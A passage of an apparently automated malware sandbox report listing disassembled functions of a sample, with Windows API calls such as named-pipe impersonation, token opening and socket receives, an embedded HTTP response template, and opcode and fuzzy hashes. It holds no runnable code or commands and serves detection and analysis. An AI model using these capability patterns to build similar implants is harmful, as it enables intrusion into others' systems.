                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • free.LIBCMT ref: 00A4867E
                          • Part of subcall function 00A4E644: _errno.LIBCMT ref: 00A4E664
                        • malloc.LIBCMT ref: 00A486CE
                        • _snprintf.LIBCMT ref: 00A486E6
                        • free.LIBCMT ref: 00A4870E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                        • String ID: /'); %s
                        • API String ID: 761449704-1283008465
                        • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                        • Instruction ID: af1624884052e258f1b996bb5d8723498894bad5224ba11995aed9b869cb99bd
                        • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                        • Instruction Fuzzy Hash: 0A31D0293006C185DA199B627A253A9BF62B7CAFD0F9C4111DEE607BA5CF3DC452D304
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$OpenProcessToken
                        • String ID:
                        • API String ID: 2009710997-0
                        • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                        • Instruction ID: 816c5dd8bc26b00bf7ec11c88bce0800459619779c92f8bf19d8cb2ca2349885
                        • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                        • Instruction Fuzzy Hash: 8921D63130470486EB50AFA3E89477A6BA1EBC8BD4F144039EF5A43725DE3DC545EB51
                        APIs
                        • _errno.LIBCMT ref: 00A4F236
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A4F242
                        • __crtIsPackagedApp.LIBCMT ref: 00A4F253
                        • _dosmaperr.LIBCMT ref: 00A4F29D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 2917016420-0
                        • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                        • Instruction ID: e59b634a9549284b6ef24b9115ed70a27c505078ba652108e442382358dcdd39
                        • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                        • Instruction Fuzzy Hash: 5B21E03A700B418AEB10AF66E805329AAE1FBCABA5F1806249E4943795DFBCC4448701
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D0FC04
                          • Part of subcall function 00D01600: _getptd.LIBCMT ref: 00D01616
                          • Part of subcall function 00D01600: __updatetlocinfo.LIBCMT ref: 00D0164B
                          • Part of subcall function 00D01600: __updatetmbcinfo.LIBCMT ref: 00D01672
                        • _errno.LIBCMT ref: 00D0FC1F
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D0FC2A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 3191669884-0
                        • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                        • Instruction ID: 4094a4d3fc5ff93d1a480ea5a756f99b092951567aac74a6d9741c2822f42928
                        • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                        • Instruction Fuzzy Hash: 09217A723047888AE7219F12D4857AEB6A4F785BE4F684135EF9C07B95CB78D881CB24
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A5F004
                          • Part of subcall function 00A50A00: _getptd.LIBCMT ref: 00A50A16
                          • Part of subcall function 00A50A00: __updatetlocinfo.LIBCMT ref: 00A50A4B
                          • Part of subcall function 00A50A00: __updatetmbcinfo.LIBCMT ref: 00A50A72
                        • _errno.LIBCMT ref: 00A5F01F
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A5F02A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 3191669884-0
                        • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                        • Instruction ID: e559d319074356bed04b76843d7ad68904a8a5eea8b6f5ded6ae011a0b575c88
                        • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                        • Instruction Fuzzy Hash: 8221B2723047848EDB109F11D584A6DB7A5F798FE2F588236EF9847B86DB74C949CB00
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTickioctlsocket
                        • String ID:
                        • API String ID: 3686034022-0
                        • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                        • Instruction ID: 1c119914f86daf141c70482b34aa297fb18585952ca51038acffd86ae6e62cb7
                        • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                        • Instruction Fuzzy Hash: 7F112931300E8497E7148BE9E8443BDB361E784BB4F500225DB5986AA0DFBECD9AC721
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                        • String ID:
                        • API String ID: 4232080776-0
                        • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                        • Instruction ID: ad17a2dcae4779f98a7e66956e0394eb0c27beffa0cfe36a92b7ee35aa5ce96e
                        • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                        • Instruction Fuzzy Hash: 2511A331710648A6F791DBA1EC44BBA3371FB98F45F944217E90A42565CF7CC548C736
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                        • String ID:
                        • API String ID: 2328795619-0
                        • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                        • Instruction ID: c1ea8aa4ae9254cba09cc805bf8aa09bfaffb00aa45eddf3319ba65991f2891b
                        • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                        • Instruction Fuzzy Hash: 67515A31704750A6EB188A67A50076ABE90F794BF8F1C4724AE7D43FD4CB38D4918770
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                        • String ID:
                        • API String ID: 2328795619-0
                        • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                        • Instruction ID: a8ef089c8614d0b51c972a03b351f32c391c91440db602dc6602844fd76900ae
                        • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                        • Instruction Fuzzy Hash: 695178317047508BDB188B269A00B6AB6A0B795BF5F189735AE3943FD5CB38C89DC340
                        APIs
                        • malloc.LIBCMT ref: 00A41063
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                          • Part of subcall function 00A3C444: malloc.LIBCMT ref: 00A3C457
                        • free.LIBCMT ref: 00A4115E
                        • free.LIBCMT ref: 00A4116B
                          • Part of subcall function 00A4E644: _errno.LIBCMT ref: 00A4E664
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$freemalloc$_callnewh
                        • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                        • API String ID: 2029259483-317027030
                        • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                        • Instruction ID: 7cb2af6dd26283f416851a67329a5e638fa207dc7cd72f7068b6351c7bcb4ded
                        • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                        • Instruction Fuzzy Hash: 4551CE7670879086DB10DF62E8417AEB7A2F3C5B94F440016EE4A43B59EF7CC609CB40
                        APIs
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                          • Part of subcall function 00D00620: _errno.LIBCMT ref: 00D00577
                          • Part of subcall function 00D00620: _invalid_parameter_noinfo.LIBCMT ref: 00D00582
                        • fseek.LIBCMT ref: 00CF1730
                          • Part of subcall function 00D00EA4: _errno.LIBCMT ref: 00D00ECC
                          • Part of subcall function 00D00EA4: _invalid_parameter_noinfo.LIBCMT ref: 00D00ED7
                        • _ftelli64.LIBCMT ref: 00CF1738
                          • Part of subcall function 00D00F18: _errno.LIBCMT ref: 00D00F36
                          • Part of subcall function 00D00F18: _invalid_parameter_noinfo.LIBCMT ref: 00D00F41
                        • fseek.LIBCMT ref: 00CF1748
                          • Part of subcall function 00D00EA4: _fseek_nolock.LIBCMT ref: 00D00EF5
                        • GetFullPathNameA.KERNEL32 ref: 00CF176B
                        • malloc.LIBCMT ref: 00CF1788
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                          • Part of subcall function 00CED044: malloc.LIBCMT ref: 00CED057
                          • Part of subcall function 00CED074: htonl.WS2_32 ref: 00CED07F
                        • fclose.LIBCMT ref: 00CF1845
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                        • String ID:
                        • API String ID: 3587854850-0
                        • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                        • Instruction ID: 9972f0a17a4155b71b8a986079a3af51fc7cbd92c9df9cda01c89b0850d3f99a
                        • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                        • Instruction Fuzzy Hash: BE41E02230068492DB40EB22E8647BEA751FBD8BD0F848226EF5E47B96DF3CC506C701
                        APIs
                        • GetACP.KERNEL32 ref: 00CF5C78
                        • GetOEMCP.KERNEL32 ref: 00CF5C82
                        • GetCurrentProcessId.KERNEL32 ref: 00CF5CA8
                        • GetTickCount.KERNEL32 ref: 00CF5CB0
                          • Part of subcall function 00D0044C: _getptd.LIBCMT ref: 00D00454
                        • GetCurrentProcess.KERNEL32 ref: 00CF5CEC
                          • Part of subcall function 00CF0C64: GetModuleHandleA.KERNEL32 ref: 00CF0C79
                          • Part of subcall function 00CF0C64: GetProcAddress.KERNEL32 ref: 00CF0C89
                        • GetCurrentProcessId.KERNEL32 ref: 00CF5D5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                        • String ID:
                        • API String ID: 3426420785-0
                        • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                        • Instruction ID: d75309a62c967db3d2ced4382538c3de25419148d636ecaa414db2b0d62c8cc0
                        • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                        • Instruction Fuzzy Hash: 1C41C232710755A5EF00EBB2DC857AD23B5BB88784F400416EF0947669EF39C10AD761
                        APIs
                        • malloc.LIBCMT ref: 00CF6F5E
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • htonl.WS2_32 ref: 00CF6F91
                        • recvfrom.WS2_32 ref: 00CF6FD5
                        • WSAGetLastError.WS2_32 ref: 00CF6FE2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                        • String ID:
                        • API String ID: 2310505145-0
                        • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                        • Instruction ID: 67f82e5a7e9b67e130c8077b18c3ba75790e593c6cfc28d8c89d6343afd602b1
                        • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                        • Instruction Fuzzy Hash: D841D232204A84C2EB509F65E84473A7771FB98BA8F144226EB9D47768DF39C592CB12
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                        • String ID:
                        • API String ID: 1014270282-0
                        • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                        • Instruction ID: e5b645028ef9584a42bcad20efbe3eca39a5773e1ce4f828d71baeae9e49f05e
                        • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                        • Instruction Fuzzy Hash: 99318D3231878886EB50DF52D8443AD77A1F789BD8F084629EB4943B58DF7CC6059B11
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                        • String ID:
                        • API String ID: 1547050394-0
                        • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                        • Instruction ID: f35b7b0dade294feceaccc896f41fec81fb6c2c6c27181d70ab5e9977cbf1721
                        • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                        • Instruction Fuzzy Hash: DE112B61708782A6EB119F22AC0532EAA95FB49BC0F484421AECD97B95DF7CC4109F30
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                        • String ID:
                        • API String ID: 1547050394-0
                        • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                        • Instruction ID: c1e6709420c3ce0de1e4e03a5ac0113a1b519e64a1440a22bdde11d63f3b37a9
                        • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                        • Instruction Fuzzy Hash: 43112B35314B8299DB115F32AD0132EB6A1BBC9BC0F446431EE8D97B56EF3CC4408700
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                        • String ID:
                        • API String ID: 2102446242-0
                        • Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                        • Instruction ID: eb2d7e8ee6dcb5044ee72dec93f47a9f8ac4046ee5b1bde62912abb55b1c60ab
                        • Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                        • Instruction Fuzzy Hash: 3411E231300B81C5EB056F69E99133E6A65BB817A2F5A422CEE1A4F392DB78C849C715
                        APIs
                        • malloc.LIBCMT ref: 00CEFC85
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • free.LIBCMT ref: 00CEFCC0
                        • fwrite.LIBCMT ref: 00CEFD01
                        • fclose.LIBCMT ref: 00CEFD09
                        • free.LIBCMT ref: 00CEFD16
                          • Part of subcall function 00CFF244: HeapFree.KERNEL32 ref: 00CFF25A
                          • Part of subcall function 00CFF244: _errno.LIBCMT ref: 00CFF264
                          • Part of subcall function 00CFF244: GetLastError.KERNEL32 ref: 00CFF26C
                        • GetLastError.KERNEL32 ref: 00CEFD1B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                        • String ID:
                        • API String ID: 1616846154-0
                        • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                        • Instruction ID: 4a967231e99b413d1ec4199bfb147fe412170afc2a88e3db4e5ca9362211562e
                        • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                        • Instruction Fuzzy Hash: 8911C46130478441DA10EB23A45137EA791EBC5FE4F544239EFAD4BB8ADE2DC6028791
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                        • String ID:
                        • API String ID: 3798860377-0
                        • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                        • Instruction ID: 9a0fa2a4765654ac6eea1d0d0bc8175e71279028bc1ce0814cb8716d4bccc1ff
                        • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                        • Instruction Fuzzy Hash: 6511013230474493FB54AB61F51873E2361F784BA4F404212EB6A47B94CF7DC4958B12
                        APIs
                        • malloc.LIBCMT ref: 00CFF00F
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • malloc.LIBCMT ref: 00CFF01D
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF318
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF31D
                        • malloc.LIBCMT ref: 00CFF03F
                        • _snprintf.LIBCMT ref: 00CFF05A
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • malloc.LIBCMT ref: 00CFF075
                        Strings
                        • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 00CFF044
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                        • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                        • API String ID: 3518644649-2739389480
                        • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                        • Instruction ID: fe396bd12a2e989add541c25bb97172eaf9af5c03cd34e9ab9f067b7f1a305a6
                        • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                        • Instruction Fuzzy Hash: 4101D231701B9842DA84DB52B8447297699FB8CFE0F14422EEFA9477C5CF78C042C780
                        APIs
                        • malloc.LIBCMT ref: 00A4E40F
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • malloc.LIBCMT ref: 00A4E41D
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E718
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E71D
                        • malloc.LIBCMT ref: 00A4E43F
                        • _snprintf.LIBCMT ref: 00A4E45A
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • malloc.LIBCMT ref: 00A4E475
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                        • String ID: dpoolWait
                        • API String ID: 2026495703-1875951006
                        • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                        • Instruction ID: a56e08d080d14a2b1a1ef28545ada4ef59e784aceaff782bfcad1907c56b6dc5
                        • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                        • Instruction Fuzzy Hash: B201DE75B01B9081DA04DB12B904719B7A9F7E8FE0F06822AEFA947BC5CF38C0418780
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: freemallocstrchr$rand
                        • String ID:
                        • API String ID: 1305919620-0
                        • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                        • Instruction ID: 31c52b4e1b38a4b91f7b4411b5774b62390fc80fdfe03ed31eb99e5ced730059
                        • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                        • Instruction Fuzzy Hash: 92614862708FC851EA669F29A4013FAABA0EF95BC4F084125DF8917B65EE3DC347C301
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: freemallocstrchr$rand
                        • String ID:
                        • API String ID: 1305919620-0
                        • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                        • Instruction ID: 652003613a098fd244f1d69123b6e0225d35e89d54ed4cdca683d1c49fe6ae90
                        • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                        • Instruction Fuzzy Hash: 44612966604FC481EA26DB29A5113EAA7A0FFD9BC4F485124EF8917B55EF3DC147C700
                        APIs
                        • malloc.LIBCMT ref: 00CE41BD
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • malloc.LIBCMT ref: 00CE41C8
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF318
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF31D
